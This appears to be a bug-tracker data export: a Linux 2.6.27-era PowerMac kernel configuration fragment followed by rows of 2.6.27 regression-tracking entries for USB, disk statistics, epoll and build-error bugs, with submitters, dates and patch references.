CONFIG_IP_VS_LBLCR=m CONFIG_IP_VS_DH=m CONFIG_IP_VS_SH=m CONFIG_IP_VS_SED=m CONFIG_IP_VS_NQ=m # # IPVS application helper # CONFIG_IP_VS_FTP=m # # IP: Netfilter Configuration # # CONFIG_NF_DEFRAG_IPV4 is not set # CONFIG_NF_CONNTRACK_IPV4 is not set CONFIG_IP_NF_QUEUE=m # CONFIG_IP_NF_IPTABLES is not set # CONFIG_IP_NF_ARPTABLES is not set # # IPv6: Netfilter Configuration # # CONFIG_NF_CONNTRACK_IPV6 is not set # CONFIG_IP6_NF_QUEUE is not set # CONFIG_IP6_NF_IPTABLES is not set CONFIG_BRIDGE_NF_EBTABLES=m CONFIG_BRIDGE_EBT_BROUTE=m CONFIG_BRIDGE_EBT_T_FILTER=m CONFIG_BRIDGE_EBT_T_NAT=m CONFIG_BRIDGE_EBT_802_3=m CONFIG_BRIDGE_EBT_AMONG=m CONFIG_BRIDGE_EBT_ARP=m CONFIG_BRIDGE_EBT_IP=m # CONFIG_BRIDGE_EBT_IP6 is not set CONFIG_BRIDGE_EBT_LIMIT=m CONFIG_BRIDGE_EBT_MARK=m CONFIG_BRIDGE_EBT_PKTTYPE=m CONFIG_BRIDGE_EBT_STP=m CONFIG_BRIDGE_EBT_VLAN=m CONFIG_BRIDGE_EBT_ARPREPLY=m CONFIG_BRIDGE_EBT_DNAT=m CONFIG_BRIDGE_EBT_MARK_T=m CONFIG_BRIDGE_EBT_REDIRECT=m CONFIG_BRIDGE_EBT_SNAT=m CONFIG_BRIDGE_EBT_LOG=m CONFIG_BRIDGE_EBT_ULOG=m # CONFIG_BRIDGE_EBT_NFLOG is not set # CONFIG_IP_DCCP is not set # CONFIG_IP_SCTP is not set # CONFIG_TIPC is not set # CONFIG_ATM is not set CONFIG_STP=m CONFIG_BRIDGE=m # CONFIG_NET_DSA is not set CONFIG_VLAN_8021Q=m # CONFIG_VLAN_8021Q_GVRP is not set # CONFIG_DECNET is not set CONFIG_LLC=m # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set CONFIG_NET_SCHED=y # # Queueing/Scheduling # CONFIG_NET_SCH_CBQ=m CONFIG_NET_SCH_HTB=m CONFIG_NET_SCH_HFSC=m CONFIG_NET_SCH_PRIO=m # CONFIG_NET_SCH_MULTIQ is not set CONFIG_NET_SCH_RED=m CONFIG_NET_SCH_SFQ=m CONFIG_NET_SCH_TEQL=m CONFIG_NET_SCH_TBF=m CONFIG_NET_SCH_GRED=m CONFIG_NET_SCH_DSMARK=m CONFIG_NET_SCH_NETEM=m CONFIG_NET_SCH_INGRESS=m # # Classification # CONFIG_NET_CLS=y CONFIG_NET_CLS_BASIC=m CONFIG_NET_CLS_TCINDEX=m CONFIG_NET_CLS_ROUTE4=m CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=m # CONFIG_NET_CLS_U32 is not set # CONFIG_NET_CLS_RSVP is not set # CONFIG_NET_CLS_RSVP6 is not set # CONFIG_NET_CLS_FLOW is not set # CONFIG_NET_EMATCH is not set CONFIG_NET_CLS_ACT=y CONFIG_NET_ACT_POLICE=m CONFIG_NET_ACT_GACT=m # CONFIG_GACT_PROB is not set CONFIG_NET_ACT_MIRRED=m CONFIG_NET_ACT_NAT=m CONFIG_NET_ACT_PEDIT=m # CONFIG_NET_ACT_SIMP is not set # CONFIG_NET_ACT_SKBEDIT is not set # CONFIG_NET_CLS_IND is not set CONFIG_NET_SCH_FIFO=y # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_NET_TCPPROBE is not set # CONFIG_HAMRADIO is not set # CONFIG_CAN is not set # CONFIG_IRDA is not set CONFIG_BT=m CONFIG_BT_L2CAP=m CONFIG_BT_SCO=m CONFIG_BT_RFCOMM=m CONFIG_BT_RFCOMM_TTY=y CONFIG_BT_BNEP=m CONFIG_BT_BNEP_MC_FILTER=y CONFIG_BT_BNEP_PROTO_FILTER=y CONFIG_BT_HIDP=m # # Bluetooth device drivers # CONFIG_BT_HCIBTUSB=m # CONFIG_BT_HCIUART is not set # CONFIG_BT_HCIBCM203X is not set # CONFIG_BT_HCIBPA10X is not set # CONFIG_BT_HCIBFUSB is not set # CONFIG_BT_HCIDTL1 is not set # CONFIG_BT_HCIBT3C is not set # CONFIG_BT_HCIBLUECARD is not set # CONFIG_BT_HCIBTUART is not set # CONFIG_BT_HCIVHCI is not set # CONFIG_AF_RXRPC is not set # CONFIG_PHONET is not set CONFIG_FIB_RULES=y CONFIG_WIRELESS=y CONFIG_CFG80211=m CONFIG_NL80211=y CONFIG_WIRELESS_OLD_REGULATORY=y CONFIG_WIRELESS_EXT=y # CONFIG_WIRELESS_EXT_SYSFS is not set CONFIG_LIB80211=m CONFIG_MAC80211=m # # Rate control algorithm selection # CONFIG_MAC80211_RC_PID=y CONFIG_MAC80211_RC_MINSTREL=y # CONFIG_MAC80211_RC_DEFAULT_PID is not set CONFIG_MAC80211_RC_DEFAULT_MINSTREL=y CONFIG_MAC80211_RC_DEFAULT="minstrel" CONFIG_MAC80211_MESH=y CONFIG_MAC80211_LEDS=y CONFIG_MAC80211_DEBUGFS=y CONFIG_MAC80211_DEBUG_MENU=y CONFIG_MAC80211_DEBUG_PACKET_ALIGNMENT=y CONFIG_MAC80211_NOINLINE=y CONFIG_MAC80211_VERBOSE_DEBUG=y CONFIG_MAC80211_HT_DEBUG=y # CONFIG_MAC80211_TKIP_DEBUG is not set # CONFIG_MAC80211_IBSS_DEBUG is not set CONFIG_MAC80211_VERBOSE_PS_DEBUG=y # CONFIG_MAC80211_VERBOSE_MPL_DEBUG is not set CONFIG_MAC80211_DEBUG_COUNTERS=y CONFIG_MAC80211_VERBOSE_SPECT_MGMT_DEBUG=y # CONFIG_RFKILL is not set # CONFIG_NET_9P is not set # # Device Drivers # # # Generic Driver Options # CONFIG_UEVENT_HELPER_PATH="/sbin/hotplug" CONFIG_STANDALONE=y CONFIG_PREVENT_FIRMWARE_BUILD=y CONFIG_FW_LOADER=y CONFIG_FIRMWARE_IN_KERNEL=y CONFIG_EXTRA_FIRMWARE="" # CONFIG_DEBUG_DRIVER is not set # CONFIG_DEBUG_DEVRES is not set # CONFIG_SYS_HYPERVISOR is not set CONFIG_CONNECTOR=m # CONFIG_MTD is not set CONFIG_OF_DEVICE=y CONFIG_OF_I2C=y # CONFIG_PARPORT is not set CONFIG_BLK_DEV=y # CONFIG_BLK_DEV_FD is not set # CONFIG_MAC_FLOPPY is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_COW_COMMON is not set CONFIG_BLK_DEV_LOOP=m # CONFIG_BLK_DEV_CRYPTOLOOP is not set CONFIG_BLK_DEV_NBD=m # CONFIG_BLK_DEV_SX8 is not set # CONFIG_BLK_DEV_UB is not set # CONFIG_BLK_DEV_RAM is not set CONFIG_CDROM_PKTCDVD=m CONFIG_CDROM_PKTCDVD_BUFFERS=16 # CONFIG_CDROM_PKTCDVD_WCACHE is not set # CONFIG_ATA_OVER_ETH is not set # CONFIG_BLK_DEV_HD is not set CONFIG_MISC_DEVICES=y # CONFIG_PHANTOM is not set CONFIG_EEPROM_93CX6=m # CONFIG_SGI_IOC4 is not set # CONFIG_TIFM_CORE is not set # CONFIG_ENCLOSURE_SERVICES is not set # CONFIG_HP_ILO is not set CONFIG_HAVE_IDE=y CONFIG_IDE=y # # Please see Documentation/ide/ide.txt for help/info on IDE drives # CONFIG_IDE_TIMINGS=y # CONFIG_BLK_DEV_IDE_SATA is not set CONFIG_IDE_GD=y CONFIG_IDE_GD_ATA=y # CONFIG_IDE_GD_ATAPI is not set CONFIG_BLK_DEV_IDECS=m # CONFIG_BLK_DEV_DELKIN is not set CONFIG_BLK_DEV_IDECD=y CONFIG_BLK_DEV_IDECD_VERBOSE_ERRORS=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_IDE_TASK_IOCTL is not set CONFIG_IDE_PROC_FS=y # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_PLATFORM is not set CONFIG_BLK_DEV_IDEDMA_SFF=y # # PCI IDE chipsets support # CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_PCIBUS_ORDER=y # CONFIG_BLK_DEV_GENERIC is not set # CONFIG_BLK_DEV_OPTI621 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_JMICRON is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_IT8213 is not set # CONFIG_BLK_DEV_IT821X is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SL82C105 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_VIA82CXXX is not set # CONFIG_BLK_DEV_TC86C001 is not set CONFIG_BLK_DEV_IDE_PMAC=y CONFIG_BLK_DEV_IDE_PMAC_ATA100FIRST=y CONFIG_BLK_DEV_IDEDMA_PMAC=y CONFIG_BLK_DEV_IDEDMA=y # # SCSI device support # # CONFIG_RAID_ATTRS is not set CONFIG_SCSI=m CONFIG_SCSI_DMA=y # CONFIG_SCSI_TGT is not set # CONFIG_SCSI_NETLINK is not set # CONFIG_SCSI_PROC_FS is not set # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=m # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set # CONFIG_BLK_DEV_SR is not set # CONFIG_CHR_DEV_SG is not set # CONFIG_CHR_DEV_SCH is not set # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # CONFIG_SCSI_SCAN_ASYNC is not set CONFIG_SCSI_WAIT_SCAN=m # # SCSI Transports # # CONFIG_SCSI_SPI_ATTRS is not set # CONFIG_SCSI_FC_ATTRS is not set # CONFIG_SCSI_ISCSI_ATTRS is not set # CONFIG_SCSI_SAS_ATTRS is not set # CONFIG_SCSI_SAS_LIBSAS is not set # CONFIG_SCSI_SRP_ATTRS is not set # CONFIG_SCSI_LOWLEVEL is not set # CONFIG_SCSI_LOWLEVEL_PCMCIA is not set # CONFIG_SCSI_DH is not set # CONFIG_ATA is not set CONFIG_MD=y # CONFIG_BLK_DEV_MD is not set CONFIG_BLK_DEV_DM=y # CONFIG_DM_DEBUG is not set CONFIG_DM_CRYPT=y CONFIG_DM_SNAPSHOT=m CONFIG_DM_MIRROR=m CONFIG_DM_ZERO=m # CONFIG_DM_MULTIPATH is not set # CONFIG_DM_DELAY is not set CONFIG_DM_UEVENT=y # CONFIG_FUSION is not set # # IEEE 1394 (FireWire) support # # # Enable only one of the two stacks, unless you know what you are doing # CONFIG_FIREWIRE=m CONFIG_FIREWIRE_OHCI=m CONFIG_FIREWIRE_OHCI_DEBUG=y CONFIG_FIREWIRE_SBP2=m CONFIG_IEEE1394=m CONFIG_IEEE1394_OHCI1394=m # CONFIG_IEEE1394_PCILYNX is not set CONFIG_IEEE1394_SBP2=m CONFIG_IEEE1394_SBP2_PHYS_DMA=y CONFIG_IEEE1394_ETH1394_ROM_ENTRY=y CONFIG_IEEE1394_ETH1394=m CONFIG_IEEE1394_RAWIO=m CONFIG_IEEE1394_VIDEO1394=m CONFIG_IEEE1394_DV1394=m # CONFIG_IEEE1394_VERBOSEDEBUG is not set # CONFIG_I2O is not set CONFIG_MACINTOSH_DRIVERS=y CONFIG_ADB=y # CONFIG_ADB_CUDA is not set CONFIG_ADB_PMU=y CONFIG_ADB_PMU_LED=y # CONFIG_ADB_PMU_LED_IDE is not set CONFIG_PMAC_APM_EMU=m # CONFIG_PMAC_MEDIABAY is not set CONFIG_PMAC_BACKLIGHT=y CONFIG_PMAC_BACKLIGHT_LEGACY=y CONFIG_INPUT_ADBHID=y CONFIG_MAC_EMUMOUSEBTN=y # CONFIG_THERM_WINDTUNNEL is not set CONFIG_THERM_ADT746X=y # CONFIG_WINDFARM is not set # CONFIG_PMAC_RACKMETER is not set CONFIG_NETDEVICES=y # CONFIG_IFB is not set # CONFIG_DUMMY is not set # CONFIG_BONDING is not set CONFIG_MACVLAN=m # CONFIG_EQUALIZER is not set CONFIG_TUN=m # CONFIG_VETH is not set # CONFIG_ARCNET is not set # CONFIG_PHYLIB is not set CONFIG_NET_ETHERNET=y CONFIG_MII=y # CONFIG_MACE is not set # CONFIG_BMAC is not set # CONFIG_HAPPYMEAL is not set CONFIG_SUNGEM=y # CONFIG_CASSINI is not set # CONFIG_NET_VENDOR_3COM is not set # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set # CONFIG_IBM_NEW_EMAC_ZMII is not set # CONFIG_IBM_NEW_EMAC_RGMII is not set # CONFIG_IBM_NEW_EMAC_TAH is not set # CONFIG_IBM_NEW_EMAC_EMAC4 is not set # CONFIG_IBM_NEW_EMAC_NO_FLOW_CTRL is not set # CONFIG_IBM_NEW_EMAC_MAL_CLR_ICINTSTAT is not set # CONFIG_IBM_NEW_EMAC_MAL_COMMON_ERR is not set # CONFIG_NET_PCI is not set # CONFIG_B44 is not set # CONFIG_ATL2 is not set CONFIG_NETDEV_1000=y # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_E1000E is not set # CONFIG_IP1000 is not set # CONFIG_IGB is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SIS190 is not set # CONFIG_SKGE is not set # CONFIG_SKY2 is not set # CONFIG_VIA_VELOCITY is not set # CONFIG_TIGON3 is not set # CONFIG_BNX2 is not set # CONFIG_MV643XX_ETH is not set # CONFIG_QLA3XXX is not set # CONFIG_ATL1 is not set # CONFIG_ATL1E is not set # CONFIG_JME is not set # CONFIG_NETDEV_10000 is not set # CONFIG_TR is not set # # Wireless LAN # # CONFIG_WLAN_PRE80211 is not set CONFIG_WLAN_80211=y # CONFIG_PCMCIA_RAYCS is not set # CONFIG_IPW2100 is not set # CONFIG_IPW2200 is not set CONFIG_LIBERTAS=m CONFIG_LIBERTAS_USB=m CONFIG_LIBERTAS_CS=m CONFIG_LIBERTAS_DEBUG=y CONFIG_LIBERTAS_THINFIRM=m CONFIG_LIBERTAS_THINFIRM_USB=m # CONFIG_AIRO is not set # CONFIG_HERMES is not set # CONFIG_ATMEL is not set # CONFIG_AIRO_CS is not set # CONFIG_PCMCIA_WL3501 is not set # CONFIG_PRISM54 is not set # CONFIG_USB_ZD1201 is not set CONFIG_USB_NET_RNDIS_WLAN=m CONFIG_RTL8180=m CONFIG_RTL8187=m CONFIG_ADM8211=m CONFIG_MAC80211_HWSIM=m CONFIG_P54_COMMON=m CONFIG_P54_USB=m CONFIG_P54_PCI=m CONFIG_ATH5K=m # CONFIG_ATH5K_DEBUG is not set CONFIG_ATH9K=m CONFIG_IWLWIFI=m CONFIG_IWLCORE=m # CONFIG_IWLWIFI_LEDS is not set # CONFIG_IWLWIFI_RFKILL is not set CONFIG_IWLWIFI_DEBUG=y CONFIG_IWLWIFI_DEBUGFS=y CONFIG_IWLAGN=m CONFIG_IWLAGN_SPECTRUM_MEASUREMENT=y # CONFIG_IWLAGN_LEDS is not set CONFIG_IWL4965=y CONFIG_IWL5000=y CONFIG_IWL3945=m # CONFIG_IWL3945_RFKILL is not set CONFIG_IWL3945_SPECTRUM_MEASUREMENT=y CONFIG_IWL3945_LEDS=y CONFIG_IWL3945_DEBUG=y # CONFIG_HOSTAP is not set CONFIG_B43=m CONFIG_B43_PCI_AUTOSELECT=y CONFIG_B43_PCICORE_AUTOSELECT=y CONFIG_B43_PCMCIA=y CONFIG_B43_PIO=y CONFIG_B43_NPHY=y CONFIG_B43_LEDS=y CONFIG_B43_DEBUG=y # CONFIG_B43_FORCE_PIO is not set CONFIG_B43LEGACY=m CONFIG_B43LEGACY_PCI_AUTOSELECT=y CONFIG_B43LEGACY_PCICORE_AUTOSELECT=y CONFIG_B43LEGACY_LEDS=y CONFIG_B43LEGACY_DEBUG=y CONFIG_B43LEGACY_DMA=y CONFIG_B43LEGACY_PIO=y CONFIG_B43LEGACY_DMA_AND_PIO_MODE=y # CONFIG_B43LEGACY_DMA_MODE is not set # CONFIG_B43LEGACY_PIO_MODE is not set CONFIG_ZD1211RW=m CONFIG_ZD1211RW_DEBUG=y CONFIG_RT2X00=y CONFIG_RT2400PCI=m CONFIG_RT2500PCI=m CONFIG_RT61PCI=m CONFIG_RT2500USB=m CONFIG_RT73USB=m CONFIG_RT2X00_LIB_PCI=m CONFIG_RT2X00_LIB_USB=m CONFIG_RT2X00_LIB=m CONFIG_RT2X00_LIB_FIRMWARE=y CONFIG_RT2X00_LIB_CRYPTO=y CONFIG_RT2X00_LIB_LEDS=y CONFIG_RT2X00_LIB_DEBUGFS=y CONFIG_RT2X00_DEBUG=y # # USB Network Adapters # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set CONFIG_USB_USBNET=m # CONFIG_USB_NET_AX8817X is not set CONFIG_USB_NET_CDCETHER=m # CONFIG_USB_NET_DM9601 is not set # CONFIG_USB_NET_SMSC95XX is not set # CONFIG_USB_NET_GL620A is not set CONFIG_USB_NET_NET1080=m CONFIG_USB_NET_PLUSB=m # CONFIG_USB_NET_MCS7830 is not set CONFIG_USB_NET_RNDIS_HOST=m # CONFIG_USB_NET_CDC_SUBSET is not set # CONFIG_USB_NET_ZAURUS is not set # CONFIG_NET_PCMCIA is not set # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set CONFIG_PPP=m # CONFIG_PPP_MULTILINK is not set CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=m CONFIG_PPP_SYNC_TTY=m CONFIG_PPP_DEFLATE=m CONFIG_PPP_BSDCOMP=m CONFIG_PPP_MPPE=m CONFIG_PPPOE=m # CONFIG_PPPOL2TP is not set # CONFIG_SLIP is not set CONFIG_SLHC=m # CONFIG_NET_FC is not set CONFIG_NETCONSOLE=y CONFIG_NETCONSOLE_DYNAMIC=y CONFIG_NETPOLL=y # CONFIG_NETPOLL_TRAP is not set CONFIG_NET_POLL_CONTROLLER=y # CONFIG_ISDN is not set # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y CONFIG_INPUT_FF_MEMLESS=m CONFIG_INPUT_POLLDEV=m # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y # CONFIG_INPUT_MOUSEDEV_PSAUX is not set CONFIG_INPUT_MOUSEDEV_SCREEN_X=1280 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=854 CONFIG_INPUT_JOYDEV=m CONFIG_INPUT_EVDEV=m CONFIG_INPUT_EVBUG=m # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set # CONFIG_KEYBOARD_STOWAWAY is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=m CONFIG_MOUSE_PS2_ALPS=y CONFIG_MOUSE_PS2_LOGIPS2PP=y CONFIG_MOUSE_PS2_SYNAPTICS=y CONFIG_MOUSE_PS2_LIFEBOOK=y CONFIG_MOUSE_PS2_TRACKPOINT=y # CONFIG_MOUSE_PS2_TOUCHKIT is not set # CONFIG_MOUSE_SERIAL is not set CONFIG_MOUSE_APPLETOUCH=m CONFIG_MOUSE_BCM5974=m # CONFIG_MOUSE_VSXXXAA is not set # CONFIG_INPUT_JOYSTICK is not set CONFIG_INPUT_TABLET=y # CONFIG_TABLET_USB_ACECAD is not set # CONFIG_TABLET_USB_AIPTEK is not set # CONFIG_TABLET_USB_GTCO is not set # CONFIG_TABLET_USB_KBTAB is not set CONFIG_TABLET_USB_WACOM=m # CONFIG_INPUT_TOUCHSCREEN is not set CONFIG_INPUT_MISC=y # CONFIG_INPUT_ATI_REMOTE is not set # CONFIG_INPUT_ATI_REMOTE2 is not set # CONFIG_INPUT_KEYSPAN_REMOTE is not set # CONFIG_INPUT_POWERMATE is not set # CONFIG_INPUT_YEALINK is not set # CONFIG_INPUT_CM109 is not set CONFIG_INPUT_UINPUT=m # # Hardware I/O ports # CONFIG_SERIO=y # CONFIG_SERIO_I8042 is not set # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_PCIPS2 is not set CONFIG_SERIO_LIBPS2=y # CONFIG_SERIO_RAW is not set # CONFIG_SERIO_XILINX_XPS_PS2 is not set # CONFIG_GAMEPORT is not set # # Character devices # CONFIG_VT=y CONFIG_CONSOLE_TRANSLATIONS=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y CONFIG_VT_HW_CONSOLE_BINDING=y # CONFIG_DEVKMEM is not set # CONFIG_SERIAL_NONSTANDARD is not set # CONFIG_NOZOMI is not set # # Serial drivers # # CONFIG_SERIAL_8250 is not set # # Non-8250 serial port support # # CONFIG_SERIAL_UARTLITE is not set # CONFIG_SERIAL_PMACZILOG is not set # CONFIG_SERIAL_JSM is not set CONFIG_UNIX98_PTYS=y # CONFIG_LEGACY_PTYS is not set # CONFIG_IPMI_HANDLER is not set CONFIG_HW_RANDOM=y CONFIG_NVRAM=y CONFIG_GEN_RTC=y CONFIG_GEN_RTC_X=y # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # # PCMCIA character devices # # CONFIG_SYNCLINK_CS is not set # CONFIG_CARDMAN_4000 is not set # CONFIG_CARDMAN_4040 is not set # CONFIG_IPWIRELESS is not set # CONFIG_RAW_DRIVER is not set # CONFIG_TCG_TPM is not set CONFIG_DEVPORT=y CONFIG_I2C=y CONFIG_I2C_BOARDINFO=y CONFIG_I2C_CHARDEV=y CONFIG_I2C_HELPER_AUTO=y CONFIG_I2C_ALGOBIT=y # # I2C Hardware Bus support # # # PC SMBus host controller drivers # # CONFIG_I2C_ALI1535 is not set # CONFIG_I2C_ALI1563 is not set # CONFIG_I2C_ALI15X3 is not set # CONFIG_I2C_AMD756 is not set # CONFIG_I2C_AMD8111 is not set # CONFIG_I2C_I801 is not set # CONFIG_I2C_ISCH is not set # CONFIG_I2C_PIIX4 is not set # CONFIG_I2C_NFORCE2 is not set # CONFIG_I2C_SIS5595 is not set # CONFIG_I2C_SIS630 is not set # CONFIG_I2C_SIS96X is not set # CONFIG_I2C_VIA is not set # CONFIG_I2C_VIAPRO is not set # # Mac SMBus host controller drivers # CONFIG_I2C_POWERMAC=y # # I2C system bus drivers (mostly embedded / system-on-chip) # # CONFIG_I2C_MPC is not set # CONFIG_I2C_OCORES is not set # CONFIG_I2C_SIMTEC is not set # # External I2C/SMBus adapter drivers # # CONFIG_I2C_PARPORT_LIGHT is not set # CONFIG_I2C_TAOS_EVM is not set CONFIG_I2C_TINY_USB=m # # Graphics adapter I2C/DDC channel drivers # # CONFIG_I2C_VOODOO3 is not set # # Other I2C/SMBus bus drivers # # CONFIG_I2C_PCA_PLATFORM is not set # CONFIG_I2C_STUB is not set # # Miscellaneous I2C Chip support # # CONFIG_DS1682 is not set # CONFIG_AT24 is not set # CONFIG_SENSORS_EEPROM is not set # CONFIG_SENSORS_PCF8574 is not set # CONFIG_PCF8575 is not set # CONFIG_SENSORS_PCA9539 is not set # CONFIG_SENSORS_PCF8591 is not set # CONFIG_SENSORS_MAX6875 is not set # CONFIG_SENSORS_TSL2550 is not set # CONFIG_I2C_DEBUG_CORE is not set # CONFIG_I2C_DEBUG_ALGO is not set # CONFIG_I2C_DEBUG_BUS is not set # CONFIG_I2C_DEBUG_CHIP is not set # CONFIG_SPI is not set CONFIG_ARCH_WANT_OPTIONAL_GPIOLIB=y # CONFIG_GPIOLIB is not set # CONFIG_W1 is not set CONFIG_POWER_SUPPLY=m # CONFIG_POWER_SUPPLY_DEBUG is not set # CONFIG_PDA_POWER is not set CONFIG_APM_POWER=m # CONFIG_BATTERY_DS2760 is not set CONFIG_BATTERY_PMU=m # CONFIG_BATTERY_BQ27x00 is not set CONFIG_HWMON=m # CONFIG_HWMON_VID is not set # CONFIG_SENSORS_AD7414 is not set # CONFIG_SENSORS_AD7418 is not set # CONFIG_SENSORS_ADM1021 is not set # CONFIG_SENSORS_ADM1025 is not set # CONFIG_SENSORS_ADM1026 is not set # CONFIG_SENSORS_ADM1029 is not set # CONFIG_SENSORS_ADM1031 is not set # CONFIG_SENSORS_ADM9240 is not set # CONFIG_SENSORS_ADT7470 is not set # CONFIG_SENSORS_ADT7473 is not set CONFIG_SENSORS_AMS=m CONFIG_SENSORS_AMS_PMU=y CONFIG_SENSORS_AMS_I2C=y # CONFIG_SENSORS_ATXP1 is not set # CONFIG_SENSORS_DS1621 is not set # CONFIG_SENSORS_I5K_AMB is not set # CONFIG_SENSORS_F71805F is not set # CONFIG_SENSORS_F71882FG is not set # CONFIG_SENSORS_F75375S is not set # CONFIG_SENSORS_GL518SM is not set # CONFIG_SENSORS_GL520SM is not set # CONFIG_SENSORS_IT87 is not set # CONFIG_SENSORS_LM63 is not set # CONFIG_SENSORS_LM75 is not set # CONFIG_SENSORS_LM77 is not set # CONFIG_SENSORS_LM78 is not set # CONFIG_SENSORS_LM80 is not set # CONFIG_SENSORS_LM83 is not set # CONFIG_SENSORS_LM85 is not set # CONFIG_SENSORS_LM87 is not set # CONFIG_SENSORS_LM90 is not set # CONFIG_SENSORS_LM92 is not set # CONFIG_SENSORS_LM93 is not set # CONFIG_SENSORS_MAX1619 is not set # CONFIG_SENSORS_MAX6650 is not set # CONFIG_SENSORS_PC87360 is not set # CON</t>
  </si>
  <si>
    <t>Kernel 2.6.26.5 -&gt; 2.6.27.2 [USB REGRESSION] (USB -&gt; D_STATE)</t>
  </si>
  <si>
    <t>2.6.27.2</t>
  </si>
  <si>
    <t>2008-10-25 05:58 UTC</t>
  </si>
  <si>
    <t>2008-11-11 08:32 UTC</t>
  </si>
  <si>
    <t>Subject : Kernel 2.6.26.5 -&gt; 2.6.27.2 [USB REGRESSION] (USB -&gt; D_STATE) Submitter : Justin Piszcz &lt;jpiszcz@lucidpixels.com&gt; Date : 2008-10-19 11:26 References : http://marc.info/?l=linux-kernel&amp;m=122441560120027&amp;w=4 Handled-By : Alan Stern &lt;stern@rowland.harvard.edu&gt; Handled-By : Mike Isely &lt;isely@isely.net&gt; Patch : http://linuxtv.org/hg/~mcisely/pvrusb2/rev/0bb411d8d2e4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>disk statistics issue in 2.6.27</t>
  </si>
  <si>
    <t>2008-10-25 06:03 UTC</t>
  </si>
  <si>
    <t>2008-11-16 11:07 UTC</t>
  </si>
  <si>
    <t>Subject : disk statistics issue in 2.6.27 Submitter : Miquel van Smoorenburg &lt;mikevs@xs4all.net&gt; Date : 2008-10-19 11:31 References : http://marc.info/?l=linux-kernel&amp;m=122441671421326&amp;w=4 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NULL pointer derefence since 2.6.27 in (e)poll</t>
  </si>
  <si>
    <t>2008-10-25 06:10 UTC</t>
  </si>
  <si>
    <t>2008-10-26 13:17 UTC</t>
  </si>
  <si>
    <t>Subject : NULL pointer derefence since 2.6.27 in (e)poll Submitter : "Ben Castricum" &lt;lk0810@bencastricum.nl&gt; Date : 2008-10-19 11:02 References : http://marc.info/?l=linux-kernel&amp;m=122441506419398&amp;w=4 Handled-By : Davide Libenzi &lt;davidel@xmailserver.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122428548613067&amp;w=2 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-git8 compile error in drivers/mfd/wm8350-core.c</t>
  </si>
  <si>
    <t>2008-10-25 06:23 UTC</t>
  </si>
  <si>
    <t>2008-10-25 16:08 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-git8 compile error in drivers/mfd/wm8350-core.c Submitter : Tilman Schmidt &lt;tilman@imap.cc&gt; Date : 2008-10-19 18:17 References : http://marc.info/?l=linux-kernel&amp;m=122444027920472&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-git8: max1111_read_channel and corgi_ssp_ads7846_putget missing</t>
  </si>
  <si>
    <t>2008-10-25 06:39 UTC</t>
  </si>
  <si>
    <t>2008-10-27 05:21 UTC</t>
  </si>
  <si>
